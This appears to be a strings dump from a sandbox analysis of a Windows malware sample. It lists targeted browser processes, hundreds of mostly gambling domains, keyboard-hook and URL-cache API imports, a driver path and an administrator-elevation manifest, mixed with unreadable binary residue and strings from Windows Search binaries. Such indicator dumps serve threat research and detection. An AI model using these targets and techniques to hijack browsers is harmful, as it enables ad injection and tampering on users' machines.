levram.dll;$585A4114,$844FF124;$5848ECB9,$843D7CB8;$583C013B,$897F3672;$583553A9,$8989C64F;$00000000,$313E0221;$582435BA,$8417E647;$57FB091F,$8A9C56E2;$57EB753C,$83DDE427;$57CE2D72,$8A7954CB;$57E1041F,$83D44996;$57D278E8,$83AF7D19;$57CBD35C,$83A8239C;
iehelper.dll;msdmo.nls;$2A425E19,$E532110D;$2A425E19,$E533CBAE;$2A425E19,$E5341A95;$2A425E19,$E5352366;$5281D8C1,$8505E31E;$526A2B67,$84F2FF48;$53E5E35B,$856EB8A4;
IEOPTimize.dll;swaddresbar.dll;swntrace.dll;c_2987.nls;ilovehint2.dll;orient.dll;ilovehint.dll;
snqu_proxy_X64.pdb;BACK.pdb;
MainProX.exe*5C9389C539DDEAFFA58BF110B8ED8F03
rmserver.exe
exploren.exe
lexplore.exe
fbrowser.exe
qqbrowse.exe
360chrom.exe
TaBrowse.exe
Explore.exe
taskmgr.exe
tasklis.exe
Service.exe
NOTEPAD.EXE
control.exe
clipbrd.exe
command.com
comhost.exe
comtrol.exe
taskmur.exe
Explone.exe
Servlce.exe
contool.exe
connost.exe
fbrowse.exe
Browser.exe
Firefox.exe
lsans.exe
cacis.exe
clsvc.exe
netst.exe
xuean.exe
Brows.exe
Sogou.exe
lleba.exe
Chrom.exe
baidubrowser.exe
2345Explorer.exe
liebao.exe
Maxthon.exe
TheWorld.exe
TaoBrowser.exe
7chrome.exe
qqbrowser.exe
FastIE.exe
Juzi.exe
115Chrome.exe
opera.exe
2345chrome.exe
FHBrowser.exe
ADSafeSe.exe
350chrome.exe
ttraveler.exe
twchrome.exe
Ruiying.exe
SaaYaa.exe
MiniIE.EXE
VVV.hao123.com
VVV.baidu.com
jiuwuzhizun5.com
hd9599.com
hbhaiou.com
cansondrive.com
517888.cc
9599770.net
9599332.com
VVV.sznadt.com
kemi520.com
aidonghai.com
yz66.org
888889yl.com
b2b.hc360.com
b1888.cc
ke.kle5.com
55ef5.com
VVV.ztb6.com
241655.com
s0089.com
kk.kle5.com
hg688.com
66.133.87.20
5249911.com
9705777.com
53138go.com
po.kle5.com
pujiankang.cn
388123g.com
VVV.4501.cc
40085599.com
fhcp999.com
66wj.net
0022336.com
slp789.com
vns9909.com
VVV.43336.com
9977524.com
s1268.com
VVV.828789.com
958f.vip
911sebb.info
517888.com
jueqi90.com
6789136.com
97kaihu.com
6580127.com
motosc.com
VVV.34511.com
9599488.net
k88k88k.com
104.223.242.26
mg4359.cc
yd12388.com
sandu.la
VVV.sooopu.com
VVV.cnblogs.com
95999955.net
9599778.com
VVV.88520.cc
VVV.007ii.com
bcw200.com
pqmwp.com
VVV.g7726.com
bm333444.com
VVV.009rr.com
VVV.etf88.com
csj3379.com
ystt66.com
3670239.com
935msc.com
63777b.com
VVV.bo88.com
28456.cc
jn12345.com
3344bh.com
sheser.com
VVV.du001.com
88pjdc.com
happybannerfarm.com
6163yyy.com
79bo.com
bifa1357.com
www-004455.com
pay6524.com
9599223.com
cc0033.com
x5660.com
123cc444.com
VVV.dy985.com
zzxinhangdao.com
dc1108.com
s2668.com
6.kle5.com
dd0044.com
VVV.mbet.cc
2770003.com
guo400.com
VVV.ub58.com
VVV.23036.com
123cc333.com
kkkk0166.com
VVV.7y163.com
123cc222.com
882828.cc
95jyb8.com
VVV.abepk.com
VVV.11sbc.com
ningbofojiaowang.com
club366.net
js15.cndatian.com
up8090.com
VVV.138k.cc
4444kk.com
taohuajiang.net
csywzc.com
VVV.godocha.com
87dianping.com
live.titan007.com
live.sobifen.com
www-43899.com
VVV.mfzbs.com
6060128.com
upup.bbinma.com
bocaijing.com
yl0000.org
002002m.com
bbbcmp8.com
66pp66.com
bmw55.com
bmw999888.com
bet007.com
VVV.zxx7.com
sf135.net
VVV.pj686.com
4050789.com
naixiu33.com
hqshuaimi.com
hg5987.com
VVV.hnyqty.com
www-1005.com
010716.com
0032138.com
www-887700.com
700624.com
95995566.net
vip345345.com
jvnongbao.com
6585226.com
rr678uu.co
VVV.49499.com
asiabet11.com
3939071.com
VVV.10816.com
3939053.com
milan86.com
yl882288.com
248vip.com
k5911.com
VVV.p99.com
123hiwei.com
uartaiz.com
0471am.com
11663801.com
55gg163.com
avzylu.com
rm726.com
3648918.com
zz565.net
bb565.net
glyn88.com
game88city.com
clever-china.com
sqzl99.com
cmp8d.com
80651.com
0512bgy.com
0756sys.com
pj3516.com
jinleyigou.com
727330.com
emai60.com
mmxx55.com
jkgdq.com
VVV.bmw9.com
aaa01234.com
0008109.com
5556163.com
dh2665.com
ifeng888896.com
VVV.bxchc.com
VVV.bxcho.com
VVV.bxchp.com
hgw1109.com
ty1400.com
ylg6696.com
jkgqs.com
66.133.87.55
jkgqm.com
25175704.com
gdhzxd.com
VVV.4616.com
VVV.4707.com
jkgqt.com
VVV.ay039.com
lkj9875.com
w6603.com
jkhhq.com
wxc7700.com
x33138.com
xbao99.com
9599110.com
9599hh.net
x993.com
zz402.com
f402.com
58757.com
173.255.138.123
youyou456.com
VVV.jkhwq.com
9599mm.net
cqgj0.com
xbyl345.com
tbet88.com
y33138.com
VVV.itb66.com
xinbao169.com
qiangui666.com
yuebet188.com
hao555666.com
pp88086.com
ay159.com
860923.top
85850z.com
VVV.665252.com
nbboard.com
heshangmeng.net
s88ab.com
qy8100.com
VVV.bb868.com
VVV.bo7727.com
2130.qg790.com
bwin2020.com
vic76.com
jiuwuzhizun11.com
95zz00.com
jwzzgw4.cc
882828.net
jjxieqiaoxx.com
9599333.com
VVV.565.net
yuefabo.com
ylg6266.com
VVV.yh478.net
29salon.com
VVV.478001.com
478vip.com
VVV.48111.com
my63303.com
VVV.88928.com
VVV.21222.com
bogou888.com
VVV.31999.com
tycjt1.com
long772.com
VVV.63365.com
VVV.656995.com
VVV.3505.com
VVV.2138s.com
jin3388.com
xam31999.com
ty1299.com
VVV.145a.com
www-57365.com
VVV.880ms.com
VVV.555050.com
ylg2299.com
886868.net
59bo.cc
dh5524.com
95996666.net
VVV.0008.com
xinyu588.com
VVV.8-88d.com
9000402.com
moca777.com
VVV.itb88.com
yo86567.com
111f11.com
www-23456.com
jwzzgw.cc
jiuwuzhizun11.cc
tbbet8888.com
zr88a.cc
aygj77.com
VVV.s138x.com
js00697.com
qwe654.com
VVV.aygj5.com
aoyayule.com
VVV.ay741.com
yo84756.com
haomatang.com
2221402.com
vns255.com
VVV.x6168.com
shangshangchuanmei.com
k178.vcevv.cn
weebly.com
gdzfcn.com
tbfastfast888.com
ty443.com
js9980.com
VVV.shhbm.com
wns707.com
VVV.7999.cc
ylg2099.com
86666.8994.com
aoya113.com
fa97463.com
VVV.ay951.com
VVV.farmer.com.cn
score.365rich.cn
VVV.8ff77.com
0316ga.com
600.cc
dafabet.com
VVV.ccav5.com
arsenal.com.cn
VVV.2246.com
88jt88.com
28365365.com
VVV.7m.cn
bwin0055.com
yzc178.com
VVV.ca88.com
wofacai.com
jiuwuzhizun6.cc
uu11.cc
1p111.com
jwzzgw2.com
95zz44.com
df011.com
95990777.net
anyaoying.com
2p222.com
95zz88.com
dafa888.asia
jiuwuzhizun6.com
95zz08.com
517888.net
95992828.cc
VVV.jxhu.com
VVV.cmp8.com
VVV.9178b.com
long8.cc
95992828.net
biz5.sandai.net
ylg8838.com
yzc363.com
chunv55.com
VVV.9177b.com
yusheedu.com
dafa888.com
dy7777.com
VVV.6625ss.com
xiudu868.com
95995858.cc
95998888.cc
xin1946.com
qiangui678.com
jwzzgw6.com
95zz11.com
885858.cc
yz188.com
VVV.hfyj.net
VVV.91ent.com
ad.148021.com
yzc262.com
95993838.cc
VVV.ca881.com
5555.ht
VVV.58js.com
aobo8.net
VVV.b138.cc
VVV.cr1118.com
VVV.df888.com
VVV.dfbet.com
VVV.dfbet.net
VVV.y8.cc
VVV.y9.cc
VVV.yxlm.cc
VVV.tyc.com
VVV.vn66.com
VVV.w88.com
hgbet222.com
VVV.m99.com
VVV.mg.cc
dafa888.cm
gcgc915.com
hailifang.com
hg0088.com.so
hg0088.net
hga8800.com
hgw025.com
jsc9988.com
s8s.cc
5060001.com
2055aaa.com
VVV.m402.com
VVV.660022.com
95990044.cc
1bet999.com
ad.050122.com
88jt03.com
1006163.com
dy8811.com
px0311.com
9911tyc.com
ty442.com
amws1199.com
yrmt168.com
jwzzgw6.cc
0006163.com
VVV.ay017.com
88jt33.net
zuijiabo.com
VVV.y9.tt
95993838.net
VVV.s138y.com
dafa91.cn
tongbo8888.com
51taotaoyou.com
VVV.ll-49.com
vip1922.com
050ab29.com
9882011.com
w88wap.com
63bdg.com
47.89.30.97
5345yy.com
yzc1188.com
VVV.111146.com
9927qqq.com
b365444.com
aygj587.com
hb3333.com
ddh111.com
9599qq.com
9599112.com
taotietem.com
95996868.cc
9955sbd.com
hainei.org
95996868.com
6677.us
yinhemmm.com
VVV.478009.com
qpl777.com
ylg8999.com
VVV.365445.com
aibo68.com
w88top.com
aobo00.com
8800y9.com
VVV.56666.net
ji586987.com
95993333.cc
ylg9099.com
blm0000.com
VVV.bmw7.com
VVV.ca151.com
ad.517dapai.com
59bo.com
VVV.4662.com
VVV.23456.com
VVV.anhui365.net
ylg9999.com
newbet6.com
VVV.mg123.cm
tlc187.com
VVV.sdw11.com
dhy0022.com
991991.cc
VVV.mr007.com
yo56378.com
fa74955.com
VVV.0177.com
6767385.com
9663553.com
youle44.com
cate.syd.com.cn
feibodr111.com
usot399555.cn
88jt09.com
y8b88.com
006yth.com
0112828.com
VVV.187203.com
1hgp.com
VVV.224499.com
3067k.com
365bet.mobi
4213333.cc
VVV.61cctv.com
81808188.com
VVV.87top.com
VVV.8edy.com
VVV.8k018.com
VVV.91bcd.com
94bo.net
9910z.com
VVV.am11.com
VVV.bebio.net.cn
VVV.bg33k.com
blr0088.com
boan83.com
chinabreed.com
VVV.cn-ady.com
VVV.co1860.com
VVV.cqqggqw.com
VVV.cs0759.com
dhy8855.com
dqxswzxd.com
echina365.com
feibo4.com
VVV.fmu8.com
VVV.hi688.net
hjzs888.com
VVV.ht51.com
VVV.j331.com
jin5088.com
jkg1.cc
VVV.kefu68.com
VVV.kl-cti.com
VVV.kur99.com
VVV.mngye.com
VVV.mph4.cn
n0178.com
VVV.nxbyjt.com
VVV.pgpop.com
VVV.qoyari.com
VVV.ranshao.com
VVV.safea.gov.cn
sanrasoft.com
VVV.sctv.com.cn
VVV.sopoer.com
VVV.t1889.com
t5252.com
VVV.tjjsd.com
VVV.v524.com
v8293.com
VVV.vic5.com
vtm006.com
VVV.wj880.com
wns0028.com
VVV.xy306.com
yb633.com
ying993.com
VVV.yqjnt.com
www-55977.com
www-80999.com
olog648.top
zcxtzx.com
3040168.com
9599664.com
zgbetter.com
9599221.com
xx2007.com
jiuwuzhizun00.net
cczhb.com
b9888.cc
mg000.com
yidali11.com
VVV.789990.com
VVV.869999.com
VVV.c77c.com
2007901.com
VVV.hv500.com
hvwin99.com
ds61888.cn
18dj18.com
VVV.ca518.com
VVV.06919.com
hellocareer.net
111scweb.com
mmtx77.com
vic115.com
jichenco.com
binfencai.com
9599550.com
hb9599.com
617888.cc
zggpcps.com
gtlivegaming.com
57jsc.com
VVV.ajtgl.com
ztgryfv.com
zviwmeb.com
95997878.cc
20071199.com
lvyinba.com
h88eg.com
w11e2.com
8e789.com
daben08.com
88jt66.com
029zhuangshi.com
VVV.ag983.com
307858.com
shgw123.com
00003801.com
95990011.net
66bcdf.com
mpxlks.net
b9988111.com
VVV.66440.com
VVV.66441.com
VVV.06543.com
VVV.82468.com
axlinyi.com
139vvv.com
s3668.com
s1399.com
s5456.com
s0456.com
s6799.com
s7166.com
0151.cm
027sfst.com
0329c.com
0750fan.com
1115866.com
119.145.148.100
168111777.com
172.247.41.24
20070022.com
2500fp.com
3308z.com
33aa402.com
36466a.com
3q511.com
4006118588.com
405475.cc
45.61.250.46
51ujk.com
520hghg.com
53030055.com
55502504.com
6x6js.com
7108ee.com
741580.cc
76055a.com
81581501.com
84805.net
959900009.com
95995511.net
9599889.net
9599aaa.com
99029k.com
99333666.com
9988sj.com
999202.com
99966524.com
99zz222.com
a52022.com
aaa555050.com
ag711.cc
amjs58.com
b2888.cc
bdg251.com
ben5588.com
ben7777.com
betping.net
betvictor61.com
bf.90ko.net
bifa7777.com
bjmyql.com
bmw.39960005.com
bmw999555.com
bs0055.com
bwin2003.com
bxz2017.com
ca7766.com
cqwywudao.com
csqclt.com
danbao002.com
dazhengjiaoyu.com
dlzywzj.com
dxstudy.com
ff366.net
gaxinshili.com
gds678.com
gf9922.com
gzsanli.com
hanquantz.com
hd182.net
hf6222.com
hg2288.oi
hg9801122.com
hgw9983.com
hudabo07.com
hystsn.com
jaymacawards.com
jinniu30.com
jinniu40.com
jucai234.com
justoa79.com
jxdfsh.com
jxftech.com
jxnanhu.com
jyd900.com
kaqiduoyoule.net
kingdynasty.cn
lxyl32.com
m88help.net
mg1555.com
mry3311.com
mtmkite.com
niuhubo8.com
nswzsd.com
ob1818.vip
qingree.com.cn
VVV.qn889.com
qy0707.com
sbd777.com
sdrdwh.com
sg.bjh20.com
simple-elec.com
szbcfs.net
szjiuyou.com
vns86.net
VVV.0029.com
VVV.012219.com
VVV.01bc.com
0951wx.com
VVV.1076.com
VVV.11303.com
VVV.11567.com
1524dh.com
VVV.156789.com
VVV.171100.com
VVV.177570.com
VVV.20158.com
VVV.2126e.com
VVV.22559.com
256s8s.me
VVV.257700.com
VVV.293477.com
VVV.30333.net
VVV.307250.com
VVV.338ff.com
VVV.36088l.com
VVV.365365.com
VVV.39366.com
VVV.400444.com
VVV.4267.com
VVV.4355.com
VVV.4886m.com
VVV.55365.net
VVV.635005.com
VVV.6590a.com
VVV.6590b.com
VVV.6590d.com
VVV.666111.com
VVV.68mtv.com
VVV.710.co
VVV.710j.com
VVV.710jc.com
7689js.com
VVV.7919.cc
VVV.793023.com
VVV.79709.com
VVV.80166.com
VVV.80456.com
VVV.80797.com
VVV.84777.com
VVV.87pt8.com
88jt.cc
88jt.net
VVV.895858.com
9599aa.com
9599gg.com
VVV.968yh.com
999jnh.com
b22138.com
ca0033.com
cd-cszs.com
VVV.chnfq.com
VVV.dc0066.com
VVV.earui.com
VVV.hj696.com
VVV.hjd56.com
hllzsxa.com
VVV.jnh8.com
dgvictoria.com
sqslwang.com
6x6bct.com
qiye-dianping.com
shanyuansc.com
mw-electronics.com
emeipai.net
meihuale.com
mf9999.com
VVV.ppp36.com
VVV.qn628.com
VVV.qy459.com
sbdvip.com
VVV.ts8.org
VVV.ty06.com
tycyyy.com
VVV.v7080.com
VVV.x8832.com
VVV.yh88.com
yl2222.cc
yl8886.com
ylg8003.com
VVV.yxlm.com
www-002.com
www-1307.com
wxjixing.com
x9988111.com
xc333.top
xj38a.com
xyx5188.com
yccrab.net
yilin027.com
ykdiman.net
ylg6366.com
yrmt321.com
yubojiu.com
yyhanmai.com
yyy588.com
ztc-fz.com
zzxh371.com
528ww.com
cqjuxing.cn
diwang07.top
bjkcbw.cn
45pkw.com
t.zg96.pw
VVV.a20a.club
sys169.com
615.mc96.pw
jxcpq.com
150.129.218.4
125.77.21.6
606.tsspp.com
119.167.137.9
calrafini.com
shantingst.com
aweifile.com
wzhongxing.net
118.178.243.200
lanuor.net
kailemusic.net
yaomishi.com
xiamenpainting.com
zhkingpower.com
ruichihongjiu.com
szymtjy.com
www1.juyhf.com
188ks.com
VVV.17ycw.cn
VVV.20shopping.com
VVV.xc185.com
VVV.wa0592.com
VVV.xinly.net
xingfumimi.com
dantouqibing.com
19771128.com
baitafengshui.com
xhnjt.cc
47.89.59.67
021sjjc.com
wy.92wy.com
99j.com
66169.com
91yidao.com
mishicq.com
8090cqg.com
860580.com
345zx.com
VVV.melaleuca.com.cn
45woool.com
hhgft.com
eachinfo.com
ucbug.com
VVV.44tf.com
haof.44tf.com
sfacg.com
xyxzgw.com
121.41.16.196
941pojie.com
162.212.181.20
93yd.com
haofupk.com
99inf.com
VVV.ssswm.com
s1904.com
99ting.cn
VVV.wowms.com
mc520.com
VVV.wan50.com
VVV.wf998.com
20shopping.com
net.17ycw.cn
1234567edu.com
VVV.559u.com
VVV.wg941.com
tg.mshax.com
taitognpump.com
121.40.239.48
52345.cn
921pt.com
52anzu.com
122.224.33.49
xingzhaohao.com
30ok.com
haosf.me
haosf.ws
99s.com
huzu123.com
268pk.cn
520jdwg.com
s.h1995.com
VVV.54dc.com
cqhaobangshou.com
haosf.tv
swufe.net
shutu.cc
54zz.com
markosweb.com
33sf.com
44145.wang
44134.wang
192yx.com
shenqi.com
175sf.com
sf999.com
fu.juyhf.com
2688tc.com
grrfg.com
sf822.com
rxjh45.com
zhaosf.mobi
zhaowoool.com
sewsx.com
015999.com
VVV.93u.com
ditulao.com
sf999.ws
shangjz.com
cydfh.com
zhoupuinc.com
zmdsnjtgw.com
cqw6.com
zlyzpw.com
uu171.com
cuwoool.cn
1778st.com
183.131.85.133
18wanmei.com
72714.wang
9kf.com
bibuzhengrong.com
cq697.com
d34dd.com
dj665.com
kofbobo.net
kongzhifamen.com
wanwan88.com
VVV.97mc.com
VVV.qiqiweb.com
VVV.vivi2.com
wxyongshang.com
zhaokf.com
zhaosf.cc
sf123uu.com
C:\Windows\system32\winlogon.exe
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\SysWOW64\wxpolice64.dll
C:\Windows\Explorer.EXE
C:\Windows\system32\SHELL32.dll
C:\Windows\system32\SHLWAPI.dll
C:\Windows\system32\fxsst.dll
C:\Windows\system32\msvcrt.dll
C:\Windows\System32\MMDevApi.dll
C:\Windows\system32\WINMM.dll
C:\Windows\system32\UIAutomationCore.dll
{C6CBEC98-70B9-4991-8CE5-5D846D28740C}
{60853F8B-2218-49CF-A58D-2561B9550406}
VVV.duba.com
icafe.daohang2016.com
web.daohang2016.com
wb.hao2016.net
123.wbsite2016.net
ie.wbsite2016.net
liulanqi.baidu.com
i.daohang2016.com
mk.hao2016.net
ie.56wanyx.win
hao.qq.com
index.6-6.cn
drvinst.exe
difx64.exe
.dll,Ext_RunDLL
.dll, RunIt
rundll32.exe
%s [%8X][%d]
dllhost.exe
*.dll
844D7191-2FEF-4d2b-AB06-718517B0BFC5
360Chrome\Chrome\
AppData\Local\360Chrome\Chrome\User Data\Default\Extensions\
pWin7Server.exe
JXClint.exe
yebarclient.exe
rwyNCMc.exe
TMyIdTCPServerEventCalllv
TMyIdUDPServerEventCallU
NTDLL.DLL
.hao123.com
123.sogou.com
VVV.baidu.com/
123abc.dll
lass.exe
fash.exe
txupd.exe
PPAP.EXE
TENCENTDL.EXE
a.baidu.com
c.baidu.com
s.baidu.com
cb.baidu.com
cbjs.baidu.com
sclick.baidu.com
dict.baidu.com
gimg.baidu.com
n.baidu.com
nsclick.baidu.com
picache.baidu.com
share.baidu.com
suggestion.baidu.com
s1.bdstatic.com
vie.baidu.com
CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32
internet explorer\iexplore.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360se6.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360chrome.exe
360Chrome\Chrome\Application\
%d.%d.%d.%d
hXXp://VVV.ip.cn/
b~~z0%%cz$ndyorc~$ieg%
KERNEL32.DLL
CacheIE\Content.IE5
Content.IE5
SogouExplorer\Webkit\Default\
Google\Chrome\
Opera\Opera\
application_cache\cache_groups.xml
Mozilla\Firefox\Profiles\
AppData\Local\Microsoft\Windows\
;8=$:$:$;
00-00-00-00-00
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards\
SetRegKey Error:
*.lnk
*.url
;3 #>6.&
'2, / 0&7!4-)1#
F3&%X"
9876543210/.-, *)('&%$#"!
VtjÍ
5u.HE
P_e%xqD
o%D<6
qny%U
# "%f
M9].ufM
.TdFl
t.eV=
%Sf !N
'^y]#<.mx
.iw:[
2? %S`-
3%F!T
Kw.dR
.qU7Lr
M c%u
.zH58
1.YC|
Z^<.eY"
%c'p}
fF3-$LB.RR
Kvqh5%s
1.Pe`9
.QwHr
|1*oo%x
.lzcU
.lF0g)
inflate 1.2.8 Copyright 1995-2013 Mark Adler
=j{.so_
?456789:;<=
!"#$%&'()* ,-./0123
C:\LOG1.txt
2017-10-06
17:46:23
1iu2.iu
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegQueryInfoKeyA
RegNotifyChangeKeyValue
RegFlushKey
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
WinExec
GetWindowsDirectoryA
GetProcessHeap
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
GetProcessHandleCount
shell32.dll
ShellExecuteA
SHFileOperationA
wininet.dll
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
URLMON.DLL
UrlMkGetSessionOption
ADVAPI32.DLL
wsock32.dll
Rpcrt4.dll
OLEACC.DLL
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
IdTCPStream
 IdTCPServer
0IdHTTPHeaderInfo
MyHTTPSProxyRF
IdUDPClient
website
((&)))!&$
%)01$$'&,--%
38000=344
1 0 .'7(2':
- /*-( ,''.-!$$$&'(/*) ,*/.)*72-9
PLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s=Instruction TLB, 4Kb pages, 4-way set associative, 32 entries8Instruction TLB, 4Mb pages, fully associative, 2 entries6Data TLB, 4Kb pages, 4-way set associative, 64 entries5Data TLB, 4Mb pages, 4-way set associative, 8 entries?8KB instruction cache, 4-way set associative, 32 byte line size@16KB instruction cache, 4-way set associative, 32 byte line size78KB data cache 2-way set associative, 32 byte line size916KB data cache, 4-way set associative, 32 byte line size
No help keyword specified.
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalid
Alt  Clipboard does not support Icons/Menu '%s' is already being used by another form
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
SSL status: "%s"
Metafile is not valid!Cannot change the size of an icon Invalid operation on TOleGraphic
Unsupported clipboard format
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
%s is not a valid IP address.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
No command handler found.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No execute handler found.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
'%s' is an invalid mask at (%d)$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Unable to write to %s
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d

ICZM.exe_1388_rwx_0293F000_00003000:

<requestedExecutionLevel level="requireAdministrator"/>
kernel32.dll
user32.dll
GetKeyboardType
advapi32.dll
oleaut32.dll
version.dll
gdi32.dll
ole32.dll
ntdll.dll
comctl32.dll
shell32.dll
ShellExecuteA
wininet.dll
FindNextUrlCacheEntryA
URLMON.DLL
UrlMkGetSessionOption
wsock32.dll
psapi.dll
Rpcrt4.dll
OLEACC.DLL
%sy5|l

ICZM.exe_1388_rwx_6F1D1000_00037000:

%d: o
GetProcessWindowStation
RtlCreateRegistryKey
zcÁ
Rp.af|
!d.cV
*.al|
WJ.ud
9V%x6*h
9"%X;VW
o9.MX<
9VW,.yP
J%xl&
Q.Ci4
}n.nd
C:\Windows\system32\AdN\ICZM.exe
GetProcessHeap
GetCPInfo
.text
`.rdata
@.data
.rsrc
@.reloc
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
\DosDevices\%s
\Registry\Machine\System\CurrentControlSet\Services\%s
\??\%s
%s\%s
kernel32.dll
W%s\%x
ntdll.dll
\\.\%s
%s.bak
\\.\ROkJy7CFKib

SearchProtocolHost.exe_1672:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610

SearchFilterHost.exe_2632:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
